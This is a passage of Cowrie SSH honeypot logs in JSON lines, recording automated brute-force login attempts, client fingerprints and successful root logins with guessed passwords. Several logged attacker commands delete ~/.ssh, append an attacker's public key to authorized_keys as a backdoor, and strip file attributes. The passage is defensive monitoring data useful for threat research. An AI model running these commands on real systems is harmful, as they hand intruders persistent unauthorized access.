":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:56.399183Z","src_ip":"212.227.235.229","session":"dd6454118334"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:04:56.655817Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:04:56.656692Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:04:56.931702Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:56.932683Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60406,"dst_ip":"1.2.3.4","dst_port":22,"session":"0be1e0e35de8","protocol":"ssh","message":"New connection: 212.227.235.229:60406 (1.2.3.4:22) [session: 0be1e0e35de8]","sensor":"my-vps","timestamp":"2025-08-31T05:04:57.204699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:57.205496Z","src_ip":"212.227.235.229","session":"0be1e0e35de8"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password","message":"login attempt [mysql/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:04:57.455140Z","src_ip":"212.227.235.229","session":"dd6454118334"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:57.479917Z","src_ip":"212.227.235.229","session":"0be1e0e35de8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:04:58.621247Z","src_ip":"212.227.235.229","session":"0be1e0e35de8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:58.723633Z","src_ip":"212.227.235.229","session":"dd6454118334"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:59.898126Z","src_ip":"212.227.235.229","session":"0be1e0e35de8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33424,"dst_ip":"1.2.3.4","dst_port":22,"session":"4111ef99f2d3","protocol":"ssh","message":"New connection: 212.227.235.229:33424 (1.2.3.4:22) [session: 4111ef99f2d3]","sensor":"my-vps","timestamp":"2025-08-31T05:05:00.175035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:00.176075Z","src_ip":"212.227.235.229","session":"4111ef99f2d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:00.451363Z","src_ip":"212.227.235.229","session":"4111ef99f2d3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:05:01.596909Z","src_ip":"212.227.235.229","session":"4111ef99f2d3"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:01.874116Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:01.875785Z","src_ip":"212.227.235.229","session":"4111ef99f2d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57368,"dst_ip":"1.2.3.4","dst_port":22,"session":"103a0fe53d74","protocol":"ssh","message":"New connection: 212.227.125.160:57368 (1.2.3.4:22) [session: 103a0fe53d74]","sensor":"my-vps","timestamp":"2025-08-31T05:05:02.751470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:05:03.268830Z","src_ip":"212.227.125.160","session":"103a0fe53d74"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:05:03.269793Z","src_ip":"212.227.125.160","session":"103a0fe53d74"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:05:04.753438Z","src_ip":"212.227.125.160","session":"d5b3c81eb270"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:05:04.754197Z","src_ip":"212.227.125.160","session":"d5b3c81eb270"}
{"eventid":"cowrie.login.failed","username":"server","password":"123456","message":"login attempt [server/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:05:05.522527Z","src_ip":"212.227.125.160","session":"103a0fe53d74"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:07.113449Z","src_ip":"212.227.125.160","session":"103a0fe53d74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43910,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d6dd8eb5f5c","protocol":"ssh","message":"New connection: 212.227.235.229:43910 (1.2.3.4:22) [session: 6d6dd8eb5f5c]","sensor":"my-vps","timestamp":"2025-08-31T05:05:10.961782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:10.962718Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:11.045219Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.login.success","username":"root","password":"Qi123456.","message":"login attempt [root/Qi123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:05:11.415630Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:05:11.599370Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:05:11.600031Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:05:11.601047Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:11.684551Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:05:11.909945Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:05:11.910636Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:05:11.995158Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:11.996026Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43924,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c75c696dd2d","protocol":"ssh","message":"New connection: 212.227.235.229:43924 (1.2.3.4:22) [session: 2c75c696dd2d]","sensor":"my-vps","timestamp":"2025-08-31T05:05:12.076096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:12.076756Z","src_ip":"212.227.235.229","session":"2c75c696dd2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:12.158345Z","src_ip":"212.227.235.229","session":"2c75c696dd2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:05:12.524833Z","src_ip":"212.227.235.229","session":"2c75c696dd2d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:13.610121Z","src_ip":"212.227.235.229","session":"2c75c696dd2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43928,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebffad57397c","protocol":"ssh","message":"New connection: 212.227.235.229:43928 (1.2.3.4:22) [session: ebffad57397c]","sensor":"my-vps","timestamp":"2025-08-31T05:05:13.692798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:13.693787Z","src_ip":"212.227.235.229","session":"ebffad57397c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:13.775155Z","src_ip":"212.227.235.229","session":"ebffad57397c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:05:14.144391Z","src_ip":"212.227.235.229","session":"ebffad57397c"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:14.227246Z","src_ip":"212.227.235.229","session":"6d6dd8eb5f5c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:14.228049Z","src_ip":"212.227.235.229","session":"ebffad57397c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37154,"dst_ip":"1.2.3.4","dst_port":22,"session":"00f47b8eee8b","protocol":"ssh","message":"New connection: 212.227.235.229:37154 (1.2.3.4:22) [session: 00f47b8eee8b]","sensor":"my-vps","timestamp":"2025-08-31T05:05:18.370994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:18.371666Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
